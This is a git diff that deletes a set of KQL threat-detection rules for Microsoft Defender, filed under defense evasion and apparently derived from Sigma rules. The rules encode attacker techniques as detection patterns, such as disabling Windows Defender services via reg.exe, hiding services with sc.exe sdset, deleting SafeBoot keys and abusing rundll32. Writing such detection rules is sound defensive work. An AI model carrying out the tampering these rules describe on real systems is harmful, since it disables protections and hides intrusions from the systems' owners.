Description: Detects the execution of a renamed ProcDump executable often used by attackers or malware -// Tags: attack.defense_evasion, attack.t1036.003 -DeviceProcessEvents -| where (ProcessVersionInfoOriginalFileName =~ "procdump" or ((ProcessCommandLine contains " -ma " or ProcessCommandLine contains " /ma ") and (ProcessCommandLine contains " -accepteula " or ProcessCommandLine contains " /accepteula "))) and (not((FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql b/Defense Evasion/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql deleted file mode 100644 index 6b0bdff3..00000000 --- a/Defense Evasion/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/19 -// Level: medium -// Description: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field -// Tags: attack.defense_evasion, attack.collection, attack.command_and_control, attack.discovery, attack.s0592 -DeviceProcessEvents -| where ProcessVersionInfoProductName =~ "Remote Utilities" and (not((FolderPath endswith "\\rutserv.exe" or FolderPath endswith "\\rfusclient.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Renamed_Vmnat.exe_Execution.kql b/Defense Evasion/Renamed_Vmnat.exe_Execution.kql deleted file mode 100644 index 9e5bf562..00000000 --- a/Defense Evasion/Renamed_Vmnat.exe_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: elhoim -// Date: 2022/09/09 -// Level: high -// Description: Detects renamed vmnat.exe or portable version that can be used for DLL side-loading -// Tags: attack.defense_evasion, attack.t1574.002 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "vmnat.exe" and (not(FolderPath endswith "vmnat.exe")) \ No newline at end of file diff --git a/Defense Evasion/Response_File_Execution_Via_Odbcconf.EXE.kql b/Defense Evasion/Response_File_Execution_Via_Odbcconf.EXE.kql deleted file mode 100644 index b9cadb73..00000000 --- a/Defense Evasion/Response_File_Execution_Via_Odbcconf.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/22 -// Level: medium -// Description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action. -// Tags: attack.defense_evasion, attack.t1218.008 -DeviceProcessEvents -| where (ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f ") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe") and ProcessCommandLine contains ".rsp" \ No newline at end of file diff --git a/Defense Evasion/RestrictedAdminMode_Registry_Value_Tampering.kql b/Defense Evasion/RestrictedAdminMode_Registry_Value_Tampering.kql deleted file mode 100644 index 2611f7a6..00000000 --- a/Defense Evasion/RestrictedAdminMode_Registry_Value_Tampering.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113 -// Date: 2023/01/13 -// Level: high -// Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. -RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. -This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise - -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where RegistryKey endswith "System\\CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin" \ No newline at end of file diff --git a/Defense Evasion/RestrictedAdminMode_Registry_Value_Tampering_-_ProcCreation.kql b/Defense Evasion/RestrictedAdminMode_Registry_Value_Tampering_-_ProcCreation.kql deleted file mode 100644 index 0bf59ff5..00000000 --- a/Defense Evasion/RestrictedAdminMode_Registry_Value_Tampering_-_ProcCreation.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113 -// Date: 2023/01/13 -// Level: high -// Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. -RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. -This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise - -// Tags: attack.defense_evasion, attack.t1112 -DeviceProcessEvents -| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control\\Lsa\\" and ProcessCommandLine contains "DisableRestrictedAdmin" \ No newline at end of file diff --git a/Defense Evasion/Root_Certificate_Installed_From_Susp_Locations.kql b/Defense Evasion/Root_Certificate_Installed_From_Susp_Locations.kql deleted file mode 100644 index a929c0d8..00000000 --- a/Defense Evasion/Root_Certificate_Installed_From_Susp_Locations.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/09 -// Level: high -// Description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. -// Tags: attack.defense_evasion, attack.t1553.004 -DeviceProcessEvents -| where (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains ":\\Windows\\TEMP\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\") and (ProcessCommandLine contains "Import-Certificate" and ProcessCommandLine contains " -FilePath " and ProcessCommandLine contains "Cert:\\LocalMachine\\Root") \ No newline at end of file diff --git a/Defense Evasion/RunDLL32_Spawning_Explorer.kql b/Defense Evasion/RunDLL32_Spawning_Explorer.kql deleted file mode 100644 index f0782750..00000000 --- a/Defense Evasion/RunDLL32_Spawning_Explorer.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: elhoim, CD_ROM_ -// Date: 2022/04/27 -// Level: high -// Description: Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way -// Tags: attack.defense_evasion, attack.t1218.011 -DeviceProcessEvents -| where (FolderPath endswith "\\explorer.exe" and InitiatingProcessFolderPath endswith "\\rundll32.exe") and (not(InitiatingProcessCommandLine contains "\\shell32.dll,Control_RunDLL")) \ No newline at end of file diff --git a/Defense Evasion/Run_Once_Task_Configuration_in_Registry.kql b/Defense Evasion/Run_Once_Task_Configuration_in_Registry.kql deleted file mode 100644 index ae35c612..00000000 --- a/Defense Evasion/Run_Once_Task_Configuration_in_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Avneet Singh @v3t0_, oscd.community -// Date: 2020/11/15 -// Level: medium -// Description: Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where (RegistryKey contains "\\Microsoft\\Active Setup\\Installed Components" and RegistryKey endswith "\\StubPath") and (not(((RegistryValueData contains "C:\\Program Files\\Google\\Chrome\\Application\\" and RegistryValueData contains "\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level") or ((RegistryValueData contains "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\" or RegistryValueData contains "C:\\Program Files\\Microsoft\\Edge\\Application\\") and RegistryValueData endswith "\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable")))) \ No newline at end of file diff --git a/Defense Evasion/Run_Once_Task_Execution_as_Configured_in_Registry.kql b/Defense Evasion/Run_Once_Task_Execution_as_Configured_in_Registry.kql deleted file mode 100644 index 614c8ce9..00000000 --- a/Defense Evasion/Run_Once_Task_Execution_as_Configured_in_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Avneet Singh @v3t0_, oscd.community, Christopher Peacock @SecurePeacock (updated) -// Date: 2020/10/18 -// Level: low -// Description: This rule detects the execution of Run Once task as configured in the registry -// Tags: attack.defense_evasion, attack.t1112 -DeviceProcessEvents -| where (ProcessCommandLine contains "/AlternateShellStartup" or ProcessCommandLine endswith "/r") and (FolderPath endswith "\\runonce.exe" or ProcessVersionInfoFileDescription =~ "Run Once Wrapper") \ No newline at end of file diff --git a/Defense Evasion/Run_PowerShell_Script_from_ADS.kql b/Defense Evasion/Run_PowerShell_Script_from_ADS.kql deleted file mode 100644 index 0e8c75dc..00000000 --- a/Defense Evasion/Run_PowerShell_Script_from_ADS.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Sergey Soldatov, Kaspersky Lab, oscd.community -// Date: 2019/10/30 -// Level: high -// Description: Detects PowerShell script execution from Alternate Data Stream (ADS) -// Tags: attack.defense_evasion, attack.t1564.004 -DeviceProcessEvents -| where (ProcessCommandLine contains "Get-Content" and ProcessCommandLine contains "-Stream") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/Defense Evasion/Run_PowerShell_Script_from_Redirected_Input_Stream.kql b/Defense Evasion/Run_PowerShell_Script_from_Redirected_Input_Stream.kql deleted file mode 100644 index bd9b3783..00000000 --- a/Defense Evasion/Run_PowerShell_Script_from_Redirected_Input_Stream.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Moriarty Meng (idea), Anton Kutepov (rule), oscd.community -// Date: 2020/10/17 -// Level: high -// Description: Detects PowerShell script execution via input stream redirect -// Tags: attack.defense_evasion, attack.execution, attack.t1059 -DeviceProcessEvents -| where ProcessCommandLine matches regex "\\s-\\s*<" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/Defense Evasion/Rundll32_Execution_With_Uncommon_DLL_Extension.kql b/Defense Evasion/Rundll32_Execution_With_Uncommon_DLL_Extension.kql deleted file mode 100644 index 7c4422f8..00000000 --- a/Defense Evasion/Rundll32_Execution_With_Uncommon_DLL_Extension.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou -// Date: 2022/01/13 -// Level: medium -// Description: Detects the execution of rundll32 with a command line that doesn't contain a common extension -// Tags: attack.defense_evasion, attack.t1218.011 -DeviceProcessEvents -| where (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and (not((ProcessCommandLine =~ "" or ((ProcessCommandLine contains ".cpl " or ProcessCommandLine contains ".cpl," or ProcessCommandLine contains ".cpl\"" or ProcessCommandLine contains ".cpl'" or ProcessCommandLine contains ".dll " or ProcessCommandLine contains ".dll," or ProcessCommandLine contains ".dll\"" or ProcessCommandLine contains ".dll'" or ProcessCommandLine contains ".inf " or ProcessCommandLine contains ".inf," or ProcessCommandLine contains ".inf\"" or ProcessCommandLine contains ".inf'") or (ProcessCommandLine endswith ".cpl" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".inf")) or ProcessCommandLine contains " -localserver " or isnull(ProcessCommandLine) or ((ProcessCommandLine contains ":\\Windows\\Installer\\" and ProcessCommandLine contains ".tmp" and ProcessCommandLine contains "zzzzInvokeManagedCustomActionOutOfProc") and InitiatingProcessFolderPath endswith "\\msiexec.exe")))) and (not((InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\AppData\\Local\\Microsoft\\EdgeUpdate\\Install\\{" and InitiatingProcessCommandLine contains "\\EDGEMITMP_" and InitiatingProcessCommandLine contains ".tmp\\setup.exe" and InitiatingProcessCommandLine contains "--install-archive=" and InitiatingProcessCommandLine contains "--previous-version=" and InitiatingProcessCommandLine contains "--msedgewebview --verbose-logging --do-not-launch-msedge --user-level"))) \ No newline at end of file diff --git a/Defense Evasion/Rundll32_Execution_Without_CommandLine_Parameters.kql b/Defense Evasion/Rundll32_Execution_Without_CommandLine_Parameters.kql deleted file mode 100644 index 11cc1e9b..00000000 --- a/Defense Evasion/Rundll32_Execution_Without_CommandLine_Parameters.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/05/27 -// Level: high -// Description: Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity -// Tags: attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where (ProcessCommandLine endswith "\\rundll32.exe" or ProcessCommandLine endswith "\\rundll32.exe\"" or ProcessCommandLine endswith "\\rundll32") and (not((InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Microsoft\\Edge\\"))) \ No newline at end of file diff --git a/Defense Evasion/Rundll32_InstallScreenSaver_Execution.kql b/Defense Evasion/Rundll32_InstallScreenSaver_Execution.kql deleted file mode 100644 index 756a6a72..00000000 --- a/Defense Evasion/Rundll32_InstallScreenSaver_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec -// Date: 2022/04/28 -// Level: medium -// Description: An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver -// Tags: attack.t1218.011, attack.defense_evasion -DeviceProcessEvents -| where ProcessCommandLine contains "InstallScreenSaver" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/Defense Evasion/Rundll32_Internet_Connection.kql b/Defense Evasion/Rundll32_Internet_Connection.kql deleted file mode 100644 index 2acd0757..00000000 --- a/Defense Evasion/Rundll32_Internet_Connection.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2017/11/04 -// Level: medium -// Description: Detects a rundll32 that communicates with public IP addresses -// Tags: attack.defense_evasion, attack.t1218.011, attack.execution -DeviceNetworkEvents -| where InitiatingProcessFolderPath endswith "\\rundll32.exe" and (not((InitiatingProcessCommandLine endswith "\\system32\\PcaSvc.dll,PcaPatchSdbTask" or DeviceName endswith ".internal.cloudapp.net" or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or (ipv4_is_in_range(RemoteIP, "20.0.0.0/8") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/16") or ipv4_is_in_range(RemoteIP, "51.105.0.0/16")) or (RemotePort == 443 and InitiatingProcessParentFileName =~ "svchost.exe")))) \ No newline at end of file diff --git a/Defense Evasion/Rundll32_Spawned_Via_Explorer.EXE.kql b/Defense Evasion/Rundll32_Spawned_Via_Explorer.EXE.kql deleted file mode 100644 index 0e6f7b7c..00000000 --- a/Defense Evasion/Rundll32_Spawned_Via_Explorer.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: CD_ROM_ -// Date: 2022/05/21 -// Level: medium -// Description: Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary. -// Tags: attack.defense_evasion -DeviceProcessEvents -| where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\explorer.exe") and (not((ProcessCommandLine contains " C:\\Windows\\System32\\" or ProcessCommandLine endswith " -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617"))) \ No newline at end of file diff --git a/Defense Evasion/Rundll32_UNC_Path_Execution.kql b/Defense Evasion/Rundll32_UNC_Path_Execution.kql deleted file mode 100644 index 17761d13..00000000 --- a/Defense Evasion/Rundll32_UNC_Path_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/10 -// Level: high -// Description: Detects rundll32 execution where the DLL is located on a remote location (share) -// Tags: attack.defense_evasion, attack.execution, attack.t1021.002, attack.t1218.011 -DeviceProcessEvents -| where ProcessCommandLine contains " \\\\" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32") \ No newline at end of file diff --git a/Defense Evasion/SCR_File_Write_Event.kql b/Defense Evasion/SCR_File_Write_Event.kql deleted file mode 100644 index 037d4717..00000000 --- a/Defense Evasion/SCR_File_Write_Event.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io -// Date: 2022/04/27 -// Level: medium -// Description: Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example. -// Tags: attack.defense_evasion, attack.t1218.011 -DeviceFileEvents -| where FolderPath endswith ".scr" and (not((FolderPath contains ":\\$WINDOWS.~BT\\NewOS\\" or FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\" or FolderPath contains ":\\WUDownloadCache\\"))) \ No newline at end of file diff --git a/Defense Evasion/SQL_Client_Tools_PowerShell_Session_Detection.kql b/Defense Evasion/SQL_Client_Tools_PowerShell_Session_Detection.kql deleted file mode 100644 index 8cf3471a..00000000 --- a/Defense Evasion/SQL_Client_Tools_PowerShell_Session_Detection.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Agro (@agro_sev) oscd.communitly -// Date: 2020/10/13 -// Level: medium -// Description: This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio. -Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. - -// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1127 -DeviceProcessEvents -| where (FolderPath endswith "\\sqltoolsps.exe" or InitiatingProcessFolderPath endswith "\\sqltoolsps.exe" or ProcessVersionInfoOriginalFileName =~ "\\sqltoolsps.exe") and (not(InitiatingProcessFolderPath endswith "\\smss.exe")) \ No newline at end of file diff --git a/Defense Evasion/SafeBoot_Registry_Key_Deleted_Via_Reg.EXE.kql b/Defense Evasion/SafeBoot_Registry_Key_Deleted_Via_Reg.EXE.kql deleted file mode 100644 index 94cb9201..00000000 --- a/Defense Evasion/SafeBoot_Registry_Key_Deleted_Via_Reg.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Tim Shelton -// Date: 2022/08/08 -// Level: high -// Description: Detects execution of "reg.exe" commands with the "delete" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where (ProcessCommandLine contains " delete " and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot") and (FolderPath endswith "reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") \ No newline at end of file diff --git a/Defense Evasion/ScreenSaver_Registry_Key_Set.kql b/Defense Evasion/ScreenSaver_Registry_Key_Set.kql deleted file mode 100644 index c98e2ab2..00000000 --- a/Defense Evasion/ScreenSaver_Registry_Key_Set.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk) -// Date: 2022/05/04 -// Level: medium -// Description: Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl -// Tags: attack.defense_evasion, attack.t1218.011 -DeviceRegistryEvents -| where InitiatingProcessFolderPath endswith "\\rundll32.exe" and (RegistryValueData endswith ".scr" and RegistryKey contains "\\Control Panel\\Desktop\\SCRNSAVE.EXE") and (not((RegistryValueData contains "C:\\Windows\\System32\\" or RegistryValueData contains "C:\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/Defense Evasion/Scripted_Diagnostics_Turn_Off_Check_Enabled_-_Registry.kql b/Defense Evasion/Scripted_Diagnostics_Turn_Off_Check_Enabled_-_Registry.kql deleted file mode 100644 index ca2477a7..00000000 --- a/Defense Evasion/Scripted_Diagnostics_Turn_Off_Check_Enabled_-_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io -// Date: 2022/06/15 -// Level: medium -// Description: Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Policies\\Microsoft\\Windows\\ScriptedDiagnostics\\TurnOffCheck" \ No newline at end of file diff --git a/Defense Evasion/Sdiagnhost_Calling_Suspicious_Child_Process.kql b/Defense Evasion/Sdiagnhost_Calling_Suspicious_Child_Process.kql deleted file mode 100644 index 620fe02e..00000000 --- a/Defense Evasion/Sdiagnhost_Calling_Suspicious_Child_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nextron Systems -// Date: 2022/06/01 -// Level: high -// Description: Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190) -// Tags: attack.defense_evasion, attack.t1036, attack.t1218 -DeviceProcessEvents -| where (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\taskkill.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\calc.exe") and InitiatingProcessFolderPath endswith "\\sdiagnhost.exe" \ No newline at end of file diff --git a/Defense Evasion/Security_Service_Disabled_Via_Reg.EXE.kql b/Defense Evasion/Security_Service_Disabled_Via_Reg.EXE.kql deleted file mode 100644 index 0e33ccc2..00000000 --- a/Defense Evasion/Security_Service_Disabled_Via_Reg.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), John Lambert (idea), elhoim -// Date: 2021/07/14 -// Level: high -// Description: Detects execution of "reg.exe" to disable security services such as Windows Defender. -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where ((ProcessCommandLine contains "\\AppIDSvc" or ProcessCommandLine contains "\\MsMpSvc" or ProcessCommandLine contains "\\NisSrv" or ProcessCommandLine contains "\\SecurityHealthService" or ProcessCommandLine contains "\\Sense" or ProcessCommandLine contains "\\UsoSvc" or ProcessCommandLine contains "\\WdBoot" or ProcessCommandLine contains "\\WdFilter" or ProcessCommandLine contains "\\WdNisDrv" or ProcessCommandLine contains "\\WdNisSvc" or ProcessCommandLine contains "\\WinDefend" or ProcessCommandLine contains "\\wscsvc" or ProcessCommandLine contains "\\wuauserv") and (ProcessCommandLine contains "d 4" and ProcessCommandLine contains "v Start")) and (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add") \ No newline at end of file diff --git a/Defense Evasion/Self_Extracting_Package_Creation_Via_Iexpress.EXE_From_Potentially_Suspicious_Location.kql b/Defense Evasion/Self_Extracting_Package_Creation_Via_Iexpress.EXE_From_Potentially_Suspicious_Location.kql deleted file mode 100644 index 6fbf2187..00000000 --- a/Defense Evasion/Self_Extracting_Package_Creation_Via_Iexpress.EXE_From_Potentially_Suspicious_Location.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk, Nasreddine Bencherchali (Nextron Systems) -// Date: 2024/02/05 -// Level: high -// Description: Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations. -This behavior has been observed in-the-wild by different threat actors. - -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ProcessCommandLine contains " /n " and (FolderPath endswith "\\iexpress.exe" or ProcessVersionInfoOriginalFileName =~ "IEXPRESS.exe") and (ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\") \ No newline at end of file diff --git a/Defense Evasion/Self_Extraction_Directive_File_Created_In_Potentially_Suspicious_Location.kql b/Defense Evasion/Self_Extraction_Directive_File_Created_In_Potentially_Suspicious_Location.kql deleted file mode 100644 index d968330c..00000000 --- a/Defense Evasion/Self_Extraction_Directive_File_Created_In_Potentially_Suspicious_Location.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2024/02/05 -// Level: medium -// Description: Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location. -These files are used by the "iexpress.exe" utility in order to create self extracting packages. -Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries. - -// Tags: attack.defense_evasion, attack.t1218 -DeviceFileEvents -| where (FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\") and FolderPath endswith ".sed" \ No newline at end of file diff --git a/Defense Evasion/Service_Binary_in_Suspicious_Folder.kql b/Defense Evasion/Service_Binary_in_Suspicious_Folder.kql deleted file mode 100644 index 2b8c5e74..00000000 --- a/Defense Evasion/Service_Binary_in_Suspicious_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), frack113 -// Date: 2022/05/02 -// Level: high -// Description: Detect the creation of a service with a service binary located in a suspicious directory -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where (((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000001)", "DWORD (0x00000002)")) and (InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Perflogs\\" or InitiatingProcessFolderPath contains "\\ADMIN$\\" or InitiatingProcessFolderPath contains "\\Temp\\") and RegistryKey endswith "\\Start" and RegistryKey startswith "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services") or ((RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Perflogs\\" or RegistryValueData contains "\\ADMIN$\\" or RegistryValueData contains "\\Temp\\") and RegistryKey endswith "\\ImagePath" and RegistryKey startswith "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services")) and (not((InitiatingProcessFolderPath contains "\\Common Files\\" and InitiatingProcessFolderPath contains "\\Temp\\"))) \ No newline at end of file diff --git a/Defense Evasion/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql b/Defense Evasion/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql deleted file mode 100644 index 04c45340..00000000 --- a/Defense Evasion/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Andreas Hunkeler (@Karneades) -// Date: 2021/12/20 -// Level: high -// Description: Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable. -// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011 -DeviceProcessEvents -| where (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "DCLCWPDTSD") and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") \ No newline at end of file diff --git a/Defense Evasion/Service_Registry_Key_Deleted_Via_Reg.EXE.kql b/Defense Evasion/Service_Registry_Key_Deleted_Via_Reg.EXE.kql deleted file mode 100644 index b4ed8585..00000000 --- a/Defense Evasion/Service_Registry_Key_Deleted_Via_Reg.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/01 -// Level: high -// Description: Detects execution of "reg.exe" commands with the "delete" flag on services registry key. Often used by attacker to remove AV software services -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where ProcessCommandLine contains " delete " and (FolderPath endswith "reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\services\\" \ No newline at end of file diff --git a/Defense Evasion/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql b/Defense Evasion/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql deleted file mode 100644 index a2adcfc1..00000000 --- a/Defense Evasion/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/28 -// Level: medium -// Description: Detection of sc.exe utility adding a new service with special permission which hides that service. -// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011 -DeviceProcessEvents -| where ProcessCommandLine contains "sdset" and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") \ No newline at end of file diff --git a/Defense Evasion/Service_StartupType_Change_Via_PowerShell_Set-Service.kql b/Defense Evasion/Service_StartupType_Change_Via_PowerShell_Set-Service.kql deleted file mode 100644 index c22f6141..00000000 --- a/Defense Evasion/Service_StartupType_Change_Via_PowerShell_Set-Service.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/03/04 -// Level: medium -// Description: Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual" -// Tags: attack.execution, attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where ((ProcessCommandLine 